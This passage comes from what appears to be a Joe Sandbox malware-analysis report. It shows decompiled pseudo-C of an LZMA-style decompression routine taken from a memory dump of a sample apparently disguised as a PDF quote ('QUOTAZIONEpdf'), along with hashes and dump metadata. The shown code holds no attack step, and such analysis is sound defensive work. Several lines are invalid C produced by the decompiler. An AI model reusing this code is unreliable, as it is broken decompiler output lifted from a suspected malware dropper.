                							__eax = (__eflags >= 0) - 1 + 0xb;
                							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                							goto L120;
                						case 0x16:
                							__eax =  *(__ebp - 0x30);
                							__eflags = __eax - 4;
                							if(__eax >= 4) {
                								_push(3);
                								_pop(__eax);
                							}
                							__ecx =  *(__ebp - 4);
                							 *(__ebp - 0x40) = 6;
                							__eax = __eax << 7;
                							 *(__ebp - 0x7c) = 0x19;
                							 *(__ebp - 0x58) = __eax;
                							goto L145;
                						case 0x17:
                							L145:
                							__eax =  *(__ebp - 0x40);
                							 *(__ebp - 0x50) = 1;
                							 *(__ebp - 0x48) =  *(__ebp - 0x40);
                							goto L149;
                						case 0x18:
                							L146:
                							__eflags =  *(__ebp - 0x6c);
                							if( *(__ebp - 0x6c) == 0) {
                								 *(__ebp - 0x88) = 0x18;
                								goto L170;
                							}
                							__ecx =  *(__ebp - 0x70);
                							__eax =  *(__ebp - 0xc);
                							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                							_t484 = __ebp - 0x70;
                							 *_t484 =  *(__ebp - 0x70) + 1;
                							__eflags =  *_t484;
                							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                							L148:
                							_t487 = __ebp - 0x48;
                							 *_t487 =  *(__ebp - 0x48) - 1;
                							__eflags =  *_t487;
                							L149:
                							__eflags =  *(__ebp - 0x48);
                							if( *(__ebp - 0x48) <= 0) {
                								__ecx =  *(__ebp - 0x40);
                								__ebx =  *(__ebp - 0x50);
                								0 = 1;
                								__eax = 1 << __cl;
                								__ebx =  *(__ebp - 0x50) - (1 << __cl);
                								__eax =  *(__ebp - 0x7c);
                								 *(__ebp - 0x44) = __ebx;
                								goto L140;
                							}
                							__eax =  *(__ebp - 0x50);
                							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                							__eax =  *(__ebp - 0x58);
                							__esi = __edx + __eax;
                							 *(__ebp - 0x54) = __esi;
                							__ax =  *__esi;
                							__edi = __ax & 0x0000ffff;
                							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                							__eflags =  *(__ebp - 0xc) - __ecx;
                							if( *(__ebp - 0xc) >= __ecx) {
                								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                								__cx = __ax;
                								__cx = __ax >> 5;
                								__eax = __eax - __ecx;
                								__edx = __edx + 1;
                								__eflags = __edx;
                								 *__esi = __ax;
                								 *(__ebp - 0x50) = __edx;
                							} else {
                								 *(__ebp - 0x10) = __ecx;
                								0x800 = 0x800 - __edi;
                								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                								 *__esi = __cx;
                							}
                							__eflags =  *(__ebp - 0x10) - 0x1000000;
                							if( *(__ebp - 0x10) >= 0x1000000) {
                								goto L148;
                							} else {
                								goto L146;
                							}
                						case 0x19:
                							__eflags = __ebx - 4;
                							if(__ebx < 4) {
                								 *(__ebp - 0x2c) = __ebx;
                								L119:
                								_t393 = __ebp - 0x2c;
                								 *_t393 =  *(__ebp - 0x2c) + 1;
                								__eflags =  *_t393;
                								L120:
                								__eax =  *(__ebp - 0x2c);
                								__eflags = __eax;
                								if(__eax == 0) {
                									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                									goto L170;
                								}
                								__eflags = __eax -  *(__ebp - 0x60);
                								if(__eax >  *(__ebp - 0x60)) {
                									goto L171;
                								}
                								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                								__eax =  *(__ebp - 0x30);
                								_t400 = __ebp - 0x60;
                								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                								__eflags =  *_t400;
                								goto L123;
                							}
                							__ecx = __ebx;
                							__eax = __ebx;
                							__ecx = __ebx >> 1;
                							__eax = __ebx & 0x00000001;
                							__ecx = (__ebx >> 1) - 1;
                							__al = __al | 0x00000002;
                							__eax = (__ebx & 0x00000001) << __cl;
                							__eflags = __ebx - 0xe;
                							 *(__ebp - 0x2c) = __eax;
                							if(__ebx >= 0xe) {
                								__ebx = 0;
                								 *(__ebp - 0x48) = __ecx;
                								L102:
                								__eflags =  *(__ebp - 0x48);
                								if( *(__ebp - 0x48) <= 0) {
                									__eax = __eax + __ebx;
                									 *(__ebp - 0x40) = 4;
                									 *(__ebp - 0x2c) = __eax;
                									__eax =  *(__ebp - 4);
                									__eax =  *(__ebp - 4) + 0x644;
                									__eflags = __eax;
                									L108:
                									__ebx = 0;
                									 *(__ebp - 0x58) = __eax;
                									 *(__ebp - 0x50) = 1;
                									 *(__ebp - 0x44) = 0;
                									 *(__ebp - 0x48) = 0;
                									L112:
                									__eax =  *(__ebp - 0x40);
                									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                										_t391 = __ebp - 0x2c;
                										 *_t391 =  *(__ebp - 0x2c) + __ebx;
                										__eflags =  *_t391;
                										goto L119;
                									}
                									__eax =  *(__ebp - 0x50);
                									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                									__eax =  *(__ebp - 0x58);
                									__esi = __edi + __eax;
                									 *(__ebp - 0x54) = __esi;
                									__ax =  *__esi;
                									__ecx = __ax & 0x0000ffff;
                									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                									__eflags =  *(__ebp - 0xc) - __edx;
                									if( *(__ebp - 0xc) >= __edx) {
                										__ecx = 0;
                										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                										__ecx = 1;
                										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                										__ebx = 1;
                										__ecx =  *(__ebp - 0x48);
                										__ebx = 1 << __cl;
                										__ecx = 1 << __cl;
                										__ebx =  *(__ebp - 0x44);
                										__ebx =  *(__ebp - 0x44) | __ecx;
                										__cx = __ax;
                										__cx = __ax >> 5;
                										__eax = __eax - __ecx;
                										__edi = __edi + 1;
                										__eflags = __edi;
                										 *(__ebp - 0x44) = __ebx;
                										 *__esi = __ax;
                										 *(__ebp - 0x50) = __edi;
                									} else {
                										 *(__ebp - 0x10) = __edx;
                										0x800 = 0x800 - __ecx;
                										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                										 *__esi = __dx;
                									}
                									__eflags =  *(__ebp - 0x10) - 0x1000000;
                									if( *(__ebp - 0x10) >= 0x1000000) {
                										L111:
                										_t368 = __ebp - 0x48;
                										 *_t368 =  *(__ebp - 0x48) + 1;
                										__eflags =  *_t368;
                										goto L112;
                									} else {
                										goto L109;
                									}
                								}
                								__ecx =  *(__ebp - 0xc);
                								__ebx = __ebx + __ebx;
                								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                								 *(__ebp - 0x44) = __ebx;
                								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                									__ecx =  *(__ebp - 0x10);
                									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                									__ebx = __ebx | 0x00000001;
                									__eflags = __ebx;
                									 *(__ebp - 0x44) = __ebx;
                								}
                								__eflags =  *(__ebp - 0x10) - 0x1000000;
                								if( *(__ebp - 0x10) >= 0x1000000) {
                									L101:
                									_t338 = __ebp - 0x48;
                									 *_t338 =  *(__ebp - 0x48) - 1;
                									__eflags =  *_t338;
                									goto L102;
                								} else {
                									goto L99;
                								}
                							}
                							__edx =  *(__ebp - 4);
                							__eax = __eax - __ebx;
                							 *(__ebp - 0x40) = __ecx;
                							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                							goto L108;
                						case 0x1a:
                							L56:
                							__eflags =  *(__ebp - 0x64);
                							if( *(__ebp - 0x64) == 0) {
                								 *(__ebp - 0x88) = 0x1a;
                								goto L170;
                							}
                							__ecx =  *(__ebp - 0x68);
                							__al =  *(__ebp - 0x5c);
                							__edx =  *(__ebp - 8);
                							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                							 *( *(__ebp - 0x68)) = __al;
                							__ecx =  *(__ebp - 0x14);
                							 *(__ecx +  *(__ebp - 8)) = __al;
                							__eax = __ecx + 1;
                							__edx = 0;
                							_t192 = __eax %  *(__ebp - 0x74);
                							__eax = __eax /  *(__ebp - 0x74);
                							__edx = _t192;
                							goto L79;
                						case 0x1b:
                							goto L75;
                						case 0x1c:
                							while(1) {
                								L123:
                								__eflags =  *(__ebp - 0x64);
                								if( *(__ebp - 0x64) == 0) {
                									break;
                								}
                								__eax =  *(__ebp - 0x14);
                								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                								__eflags = __eax -  *(__ebp - 0x74);
                								if(__eax >=  *(__ebp - 0x74)) {
                									__eax = __eax +  *(__ebp - 0x74);
                									__eflags = __eax;
                								}
                								__edx =  *(__ebp - 8);
                								__cl =  *(__eax + __edx);
                								__eax =  *(__ebp - 0x14);
                								 *(__ebp - 0x5c) = __cl;
                								 *(__eax + __edx) = __cl;
                								__eax = __eax + 1;
                								__edx = 0;
                								_t414 = __eax %  *(__ebp - 0x74);
                								__eax = __eax /  *(__ebp - 0x74);
                								__edx = _t414;
                								__eax =  *(__ebp - 0x68);
                								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                								__eflags =  *(__ebp - 0x30);
                								 *( *(__ebp - 0x68)) = __cl;
                								 *(__ebp - 0x14) = _t414;
                								if( *(__ebp - 0x30) > 0) {
                									continue;
                								} else {
                									goto L80;
                								}
                							}
                							 *(__ebp - 0x88) = 0x1c;
                							goto L170;
                					}
                				}
                			}














                Memory Dump Source
                • Source File: 00000001.00000002.300595966.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.300589722.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000001.00000002.300601525.0000000000407000.00000002.00020000.sdmp
                • Associated: 00000001.00000002.300605629.0000000000409000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300623029.0000000000422000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300631122.0000000000429000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300636246.000000000042C000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 15aa086d42ea43156f7fbf6fbf97274f99b2efc4d47cfe7aa8cc3aef762d7e26
                • Instruction ID: 22847fb14cdf7a24f95a3c84300c4786f150dfac54d3f328c430af40b2e48c23
                • Opcode Fuzzy Hash: 15aa086d42ea43156f7fbf6fbf97274f99b2efc4d47cfe7aa8cc3aef762d7e26
                • Instruction Fuzzy Hash: EB816871D04229CFDF24CFA8C844BAEBBB1FB44305F25816AD406BB281C7789A86DF54
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 98%
                			E00405E9D(void* __ecx) {
                				void* _v8;
                				void* _v12;
                				signed int _v16;
                				unsigned int _v20;
                				signed int _v24;
                				signed int _v28;
                				signed int _v32;
                				signed int _v36;
                				signed int _v40;
                				signed int _v44;
                				signed int _v48;
                				signed int _v52;
                				signed int _v56;
                				signed int _v60;
                				signed int _v64;
                				signed int _v68;
                				signed int _v72;
                				signed int _v76;
                				signed int _v80;
                				signed int _v84;
                				signed int _v88;
                				signed int _v92;
                				signed int _v95;
                				signed int _v96;
                				signed int _v100;
                				signed int _v104;
                				signed int _v108;
                				signed int _v112;
                				signed int _v116;
                				signed int _v120;
                				intOrPtr _v124;
                				signed int _v128;
                				signed int _v132;
                				signed int _v136;
                				void _v140;
                				void* _v148;
                				signed int _t537;
                				signed int _t538;
                				signed int _t572;
                
                				_t572 = 0x22;
                				_v148 = __ecx;
                				memcpy( &_v140, __ecx, _t572 << 2);
                				if(_v52 == 0xffffffff) {
                					return 1;
                				}
                				while(1) {
                					L3:
                					_t537 = _v140;
                					if(_t537 > 0x1c) {
                						break;
                					}
                					switch( *((intOrPtr*)(_t537 * 4 +  &M004068EF))) {
                						case 0:
                							__eflags = _v112;
                							if(_v112 == 0) {
                								goto L173;
                							}
                							_v112 = _v112 - 1;
                							_v116 = _v116 + 1;
                							_t537 =  *_v116;
                							__eflags = _t537 - 0xe1;
                							if(_t537 > 0xe1) {
                								goto L174;
                							}
                							_t542 = _t537 & 0x000000ff;
                							_push(0x2d);
                							asm("cdq");
                							_pop(_t576);
                							_push(9);
                							_pop(_t577);
                							_t622 = _t542 / _t576;
                							_t544 = _t542 % _t576 & 0x000000ff;
                							asm("cdq");
                							_t617 = _t544 % _t577 & 0x000000ff;
                							_v64 = _t617;
                							_v32 = (1 << _t622) - 1;
                							_v28 = (1 << _t544 / _t577) - 1;
                							_t625 = (0x300 << _t617 + _t622) + 0x736;
                							__eflags = 0x600 - _v124;
                							if(0x600 == _v124) {
                								L12:
                								__eflags = _t625;
                								if(_t625 == 0) {
                									L14:
                									_v76 = _v76 & 0x00000000;
                									_v68 = _v68 & 0x00000000;
                									goto L17;
                								} else {
                									goto L13;
                								}
                								do {
                									L13:
                									_t625 = _t625 - 1;
                									__eflags = _t625;
                									 *((short*)(_v8 + _t625 * 2)) = 0x400;
                								} while (_t625 != 0);
                								goto L14;
                							}
                							__eflags = _v8;
                							if(_v8 != 0) {
                								GlobalFree(_v8);
                							}
                							_t537 = GlobalAlloc(0x40, 0x600); // executed
                							__eflags = _t537;
                							_v8 = _t537;
                							if(_t537 == 0) {
                								goto L174;
                							} else {
                								_v124 = 0x600;
                								goto L12;
                							}
                						case 1:
                							L15:
                							__eflags = _v112;
                							if(_v112 == 0) {
                								_v140 = 1;
                								goto L173;
                							}
                							_v112 = _v112 - 1;
                							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
                							_v116 = _v116 + 1;
                							_t50 =  &_v76;
                							 *_t50 = _v76 + 1;
                							__eflags =  *_t50;
                							L17:
                							__eflags = _v76 - 4;
                							if(_v76 < 4) {
                								goto L15;
                							}
                							_t550 = _v68;
                							__eflags = _t550 - _v120;
                							if(_t550 == _v120) {
                								L22:
                								_v76 = 5;
                								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
                								goto L25;
                							}
                							__eflags = _v12;
                							_v120 = _t550;
                							if(_v12 != 0) {
                								GlobalFree(_v12);
                							}
                							_t537 = GlobalAlloc(0x40, _v68); // executed
                							__eflags = _t537;
                							_v12 = _t537;
                							if(_t537 == 0) {
                								goto L174;
                							} else {
                								goto L22;
                							}
                						case 2:
                							L26:
                							_t557 = _v100 & _v32;
                							_v136 = 6;
                							_v80 = _t557;
                							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
                							goto L135;
                						case 3:
                							L23:
                							__eflags = _v112;
                							if(_v112 == 0) {
                								_v140 = 3;
                								goto L173;
                							}
                							_v112 = _v112 - 1;
                							_t72 =  &_v116;
                							 *_t72 = _v116 + 1;
                							__eflags =  *_t72;
                							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                							L25:
                							_v76 = _v76 - 1;
                							__eflags = _v76;
                							if(_v76 != 0) {
                								goto L23;
                							}
                							goto L26;
                						case 4:
                							L136:
                							_t559 =  *_t626;
                							_t610 = _t559 & 0x0000ffff;
                							_t591 = (_v20 >> 0xb) * _t610;
                							__eflags = _v16 - _t591;
                							if(_v16 >= _t591) {
                								_v20 = _v20 - _t591;
                								_v16 = _v16 - _t591;
                								_v68 = 1;
                								_t560 = _t559 - (_t559 >> 5);
                								__eflags = _t560;
                								 *_t626 = _t560;
                							} else {
                								_v20 = _t591;
                								_v68 = _v68 & 0x00000000;
                								 *_t626 = (0x800 - _t610 >> 5) + _t559;
                							}
                							__eflags = _v20 - 0x1000000;
                							if(_v20 >= 0x1000000) {
                								goto L142;
                							} else {
                								goto L140;
                							}
                						case 5:
                							L140:
                							__eflags = _v112;
                							if(_v112 == 0) {
                								_v140 = 5;
                								goto L173;
                							}
                							_v20 = _v20 << 8;
                							_v112 = _v112 - 1;
                							_t464 =  &_v116;
                							 *_t464 = _v116 + 1;
                							__eflags =  *_t464;
                							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                							L142:
                							_t561 = _v136;
                							goto L143;
                						case 6:
                							__edx = 0;
                							__eflags = _v68;
                							if(_v68 != 0) {
                								__eax = _v8;
                								__ecx = _v60;
                								_v56 = 1;
                								_v136 = 7;
                								__esi = _v8 + 0x180 + _v60 * 2;
                								goto L135;
                							}
                							__eax = _v96 & 0x000000ff;
                							__esi = _v100;
                							__cl = 8;
                							__cl = 8 - _v64;
                							__esi = _v100 & _v28;
                							__eax = (_v96 & 0x000000ff) >> 8;
                							__ecx = _v64;
                							__esi = (_v100 & _v28) << 8;
                							__ecx = _v8;
                							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
                							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
                							__eflags = _v60 - 4;
                							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
                							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
                							if(_v60 >= 4) {
                								__eflags = _v60 - 0xa;
                								if(_v60 >= 0xa) {
                									_t103 =  &_v60;
                									 *_t103 = _v60 - 6;
                									__eflags =  *_t103;
                								} else {
                									_v60 = _v60 - 3;
                								}
                							} else {
                								_v60 = 0;
                							}
                							__eflags = _v56 - __edx;
                							if(_v56 == __edx) {
                								__ebx = 0;
                								__ebx = 1;
                								goto L63;
                							}
                							__eax = _v24;
                							__eax = _v24 - _v48;
                							__eflags = __eax - _v120;
                							if(__eax >= _v120) {
                								__eax = __eax + _v120;
                								__eflags = __eax;
                							}
                							__ecx = _v12;
                							__ebx = 0;
                							__ebx = 1;
                							__al =  *((intOrPtr*)(__eax + __ecx));
                							_v95 =  *((intOrPtr*)(__eax + __ecx));
                							goto L43;
                						case 7:
                							__eflags = _v68 - 1;
                							if(_v68 != 1) {
                								__eax = _v40;
                								_v132 = 0x16;
                								_v36 = _v40;
                								__eax = _v44;
                								_v40 = _v44;
                								__eax = _v48;
                								_v44 = _v48;
                								__eax = 0;
                								__eflags = _v60 - 7;
                								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                								__al = __al & 0x000000fd;
                								__eax = (__eflags >= 0) - 1 + 0xa;
                								_v60 = (__eflags >= 0) - 1 + 0xa;
                								__eax = _v8;
                								__eax = _v8 + 0x664;
                								__eflags = __eax;
                								_v92 = __eax;
                								goto L71;
                							}
                							__eax = _v8;
                							__ecx = _v60;
                							_v136 = 8;
                							__esi = _v8 + 0x198 + _v60 * 2;
                							goto L135;
                						case 8:
                							__eflags = _v68;
                							if(_v68 != 0) {
                								__eax = _v8;
                								__ecx = _v60;
                								_v136 = 0xa;
                								__esi = _v8 + 0x1b0 + _v60 * 2;
                							} else {
                								__eax = _v60;
                								__ecx = _v8;
                								__eax = _v60 + 0xf;
                								_v136 = 9;
                								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
                								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
                							}
                							goto L135;
                						case 9:
                							__eflags = _v68;
                							if(_v68 != 0) {
                								goto L92;
                							}
                							__eflags = _v100;
                							if(_v100 == 0) {
                								goto L174;
                							}
                							__eax = 0;
                							__eflags = _v60 - 7;
                							_t264 = _v60 - 7 >= 0;
                							__eflags = _t264;
                							0 | _t264 = _t264 + _t264 + 9;
                							_v60 = _t264 + _t264 + 9;
                							goto L78;
                						case 0xa:
                							__eflags = _v68;
                							if(_v68 != 0) {
                								__eax = _v8;
                								__ecx = _v60;
                								_v136 = 0xb;
                								__esi = _v8 + 0x1c8 + _v60 * 2;
                								goto L135;
                							}
                							__eax = _v44;
                							goto L91;
                						case 0xb:
                							__eflags = _v68;
                							if(_v68 != 0) {
                								__ecx = _v40;
                								__eax = _v36;
                								_v36 = _v40;
                							} else {
                								__eax = _v40;
                							}
                							__ecx = _v44;
                							_v40 = _v44;
                							L91:
                							__ecx = _v48;
                							_v48 = __eax;
                							_v44 = _v48;
                							L92:
                							__eax = _v8;
                							_v132 = 0x15;
                							__eax = _v8 + 0xa68;
                							_v92 = _v8 + 0xa68;
                							goto L71;
                						case 0xc:
                							L102:
                							__eflags = _v112;
                							if(_v112 == 0) {
                								_v140 = 0xc;
                								goto L173;
                							}
                							__ecx = _v116;
                							__eax = _v16;
                							_v20 = _v20 << 8;
                							__ecx =  *_v116 & 0x000000ff;
                							_v112 = _v112 - 1;
                							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                							_t340 =  &_v116;
                							 *_t340 = _v116 + 1;
                							__eflags =  *_t340;
                							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                							__eax = _v48;
                							goto L104;
                						case 0xd:
                							L39:
                							__eflags = _v112;
                							if(_v112 == 0) {
                								_v140 = 0xd;
                								goto L173;
                							}
                							__ecx = _v116;
                							__eax = _v16;
                							_v20 = _v20 << 8;
                							__ecx =  *_v116 & 0x000000ff;
                							_v112 = _v112 - 1;
                							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                							_t127 =  &_v116;
                							 *_t127 = _v116 + 1;
                							__eflags =  *_t127;
                							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                							L41:
                							__eax = _v68;
                							__eflags = _v76 - _v68;
                							if(_v76 != _v68) {
                								goto L50;
                							}
                							__eflags = __ebx - 0x100;
                							if(__ebx >= 0x100) {
                								goto L56;
                							}
                							L43:
                							__eax = _v95 & 0x000000ff;
                							_v95 = _v95 << 1;
                							__ecx = _v92;
                							__eax = (_v95 & 0x000000ff) >> 7;
                							_v76 = __eax;
                							__eax = __eax + 1;
                							__eax = __eax << 8;
                							__eax = __eax + __ebx;
                							__esi = _v92 + __eax * 2;
                							_v20 = _v20 >> 0xb;
                							__ax =  *__esi;
                							_v88 = __esi;
                							__edx = __ax & 0x0000ffff;
                							__ecx = (_v20 >> 0xb) * __edx;
                							__eflags = _v16 - __ecx;
                							if(_v16 >= __ecx) {
                								_v20 = _v20 - __ecx;
                								_v16 = _v16 - __ecx;
                								__cx = __ax;
                								_v68 = 1;
                								__cx = __ax >> 5;
                								__eflags = __eax;
                								__ebx = __ebx + __ebx + 1;
                								 *__esi = __ax;
                							} else {
                								_v68 = _v68 & 0x00000000;
                								_v20 = __ecx;
                								0x800 = 0x800 - __edx;
                								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                								__ebx = __ebx + __ebx;
                								 *__esi = __cx;
                							}
                							__eflags = _v20 - 0x1000000;
                							_v72 = __ebx;
                							if(_v20 >= 0x1000000) {
                								goto L41;
                							} else {
                								goto L39;
                							}
                						case 0xe:
                							L48:
                							__eflags = _v112;
                							if(_v112 == 0) {
                								_v140 = 0xe;
                								goto L173;
                							}
                							__ecx = _v116;
                							__eax = _v16;
                							_v20 = _v20 << 8;
                							__ecx =  *_v116 & 0x000000ff;
                							_v112 = _v112 - 1;
                							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                							_t161 =  &_v116;
                							 *_t161 = _v116 + 1;
                							__eflags =  *_t161;
                							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                							while(1) {
                								L50:
                								__eflags = __ebx - 0x100;
                								if(__ebx >= 0x100) {
                									break;
                								}
                								__eax = _v92;
                								__edx = __ebx + __ebx;
                								__ecx = _v20;
                								__esi = __edx + __eax;
                								__ecx = _v20 >> 0xb;
                								__ax =  *__esi;
                								_v88 = __esi;
                								__edi = __ax & 0x0000ffff;
                								__ecx = (_v20 >> 0xb) * __edi;
                								__eflags = _v16 - __ecx;
                								if(_v16 >= __ecx) {
                									_v20 = _v20 - __ecx;
                									_v16 = _v16 - __ecx;
                									__cx = __ax;
                									_t175 = __edx + 1; // 0x1
                									__ebx = _t175;
                									__cx = __ax >> 5;
                									__eflags = __eax;
                									 *__esi = __ax;
                								} else {
                									_v20 = __ecx;
                									0x800 = 0x800 - __edi;
                									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                									__ebx = __ebx + __ebx;
                									 *__esi = __cx;
                								}
                								__eflags = _v20 - 0x1000000;
                								_v72 = __ebx;
                								if(_v20 >= 0x1000000) {
                									continue;
                								} else {
                									goto L48;
                								}
                							}
                							L56:
                							_t178 =  &_v56;
                							 *_t178 = _v56 & 0x00000000;
                							__eflags =  *_t178;
                							goto L57;
                						case 0xf:
                							L60:
                							__eflags = _v112;
                							if(_v112 == 0) {
                								_v140 = 0xf;
                								goto L173;
                							}
                							__ecx = _v116;
                							__eax = _v16;
                							_v20 = _v20 << 8;
                							__ecx =  *_v116 & 0x000000ff;
                							_v112 = _v112 - 1;
                							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                							_t208 =  &_v116;
                							 *_t208 = _v116 + 1;
                							__eflags =  *_t208;
                							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                							L62:
                							__eflags = __ebx - 0x100;
                							if(__ebx >= 0x100) {
                								L57:
                								__al = _v72;
                								_v96 = _v72;
                								goto L58;
                							}
                							L63:
                							__eax = _v92;
                							__edx = __ebx + __ebx;
                							__ecx = _v20;
                							__esi = __edx + __eax;
                							__ecx = _v20 >> 0xb;
                							__ax =  *__esi;
                							_v88 = __esi;
                							__edi = __ax & 0x0000ffff;
                							__ecx = (_v20 >> 0xb) * __edi;
                							__eflags = _v16 - __ecx;
                							if(_v16 >= __ecx) {
                								_v20 = _v20 - __ecx;
                								_v16 = _v16 - __ecx;
                								__cx = __ax;
                								_t222 = __edx + 1; // 0x1
                								__ebx = _t222;
                								__cx = __ax >> 5;
                								__eflags = __eax;
                								 *__esi = __ax;
                							} else {
                								_v20 = __ecx;
                								0x800 = 0x800 - __edi;
                								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                								__ebx = __ebx + __ebx;
                								 *__esi = __cx;
                							}
                							__eflags = _v20 - 0x1000000;
                							_v72 = __ebx;
                							if(_v20 >= 0x1000000) {
                								goto L62;
                							} else {
                								goto L60;
                							}
                						case 0x10:
                							L112:
                							__eflags = _v112;
                							if(_v112 == 0) {
                								_v140 = 0x10;
                								goto L173;
                							}
                							__ecx = _v116;
                							__eax = _v16;
                							_v20 = _v20 << 8;
                							__ecx =  *_v116 & 0x000000ff;
                							_v112 = _v112 - 1;
                							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                							_t371 =  &_v116;
                							 *_t371 = _v116 + 1;
                							__eflags =  *_t371;
                							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                							goto L114;
                						case 0x11:
                							L71:
                							__esi = _v92;
                							_v136 = 0x12;
                							goto L135;
                						case 0x12:
                							__eflags = _v68;
                							if(_v68 != 0) {
                								__eax = _v92;
                								_v136 = 0x13;
                								__esi = _v92 + 2;
                								L135:
                								_v88 = _t626;
                								goto L136;
                							}
                							__eax = _v80;
                							_v52 = _v52 & 0x00000000;
                							__ecx = _v92;
                							__eax = _v80 << 4;
                							__eflags = __eax;
                							__eax = _v92 + __eax + 4;
                							goto L133;
                						case 0x13:
                							__eflags = _v68;
                							if(_v68 != 0) {
                								_t475 =  &_v92;
                								 *_t475 = _v92 + 0x204;
                								__eflags =  *_t475;
                								_v52 = 0x10;
                								_v68 = 8;
                								L147:
                								_v128 = 0x14;
                								goto L148;
                							}
                							__eax = _v80;
                							__ecx = _v92;
                							__eax = _v80 << 4;
                							_v52 = 8;
                							__eax = _v92 + (_v80 << 4) + 0x104;
                							L133:
                							_v92 = __eax;
                							_v68 = 3;
                							goto L147;
                						case 0x14:
                							_v52 = _v52 + __ebx;
                							__eax = _v132;
                							goto L143;
                						case 0x15:
                							__eax = 0;
                							__eflags = _v60 - 7;
                							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                							__al = __al & 0x000000fd;
                							__eax = (__eflags >= 0) - 1 + 0xb;
                							_v60 = (__eflags >= 0) - 1 + 0xb;
                							goto L123;
                						case 0x16:
                							__eax = _v52;
                							__eflags = __eax - 4;
                							if(__eax >= 4) {
                								_push(3);
                								_pop(__eax);
                							}
                							__ecx = _v8;
                							_v68 = 6;
                							__eax = __eax << 7;
                							_v128 = 0x19;
